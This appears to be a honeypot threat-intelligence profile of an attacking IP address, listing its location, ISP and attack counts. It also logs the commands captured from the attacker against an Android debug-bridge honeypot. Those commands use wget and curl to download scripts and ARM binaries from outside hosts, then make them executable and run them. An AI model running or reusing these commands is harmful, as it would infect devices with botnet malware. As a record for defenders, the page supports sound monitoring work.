Active Threat • HIGH
45.135.194.73
Country of Origin: 🇩🇪 Germany
First Detection: 1/2/2026
Last Activity: 1/14/2026
ISP: Pfcloud UG (haftungsbeschrankt)
Total Attacks: 4,357
Ports: 4
Attack Types: 3
Malware: 1
Geolocation
- Country: 🇩🇪 Germany
- City: Unknown
- ASN: AS51396
- ISP: Pfcloud UG (haftungsbeschrankt)
Attack Types
honeytrap
tanner
adbhoney
Attacked Ports
802323555537215
Associated Malware
Executed Commands
$ rm -rf /data/local/tmp/sys_helper  [3x]
$ ls -l /data/local/tmp/sys_helper  [3x]
$ cd /data/local/tmp/ ;rm -rf bins.sh; busybox wget http://45.135.194.7/bins.sh; sh bins.sh; curl http://45.135.194.7/bins.sh; sh bins.sh; wget http://45.135.194.7/bins.sh; sh bins.sh; busybox curl http://45.135.194.7/bins.sh; sh bins.sh  [2x]
$ touch /storage/emulated/0/.test_write; if [ -f /storage/emulated/0/.test_write ]; then echo WRITABLE; rm /storage/emulated/0/.test_write; fi  [1x]
$ touch /storage/sdcard0/.test_write; if [ -f /storage/sdcard0/.test_write ]; then echo WRITABLE; rm /storage/sdcard0/.test_write; fi  [1x]
$ touch /data/local/.test_write; if [ -f /data/local/.test_write ]; then echo WRITABLE; rm /data/local/.test_write; fi  [1x]
$ wget --no-check-certificate -q -O /data/local/tmp/sys_helper http://196.251.100.100/arm7  [1x]
$ cd /data/local/tmp/; rm -rf arm7*; busybox wget http://45.135.194.7/arm7; curl -O http://45.135.194.7/arm7; wget http://45.135.194.7/arm7; busybox curl -O http://45.135.194.7/arm7; chmod 777 arm7; ./arm7 adb  [1x]
$ curl -k -s -o /data/local/tmp/sys_helper http://196.251.100.100/arm7  [1x]
$ busybox wget --no-check-certificate -q -O /data/local/tmp/sys_helper http://196.251.100.100/arm7  [1x]
Risk Assessment
70/100
Scale: Low, Medium, High, Critical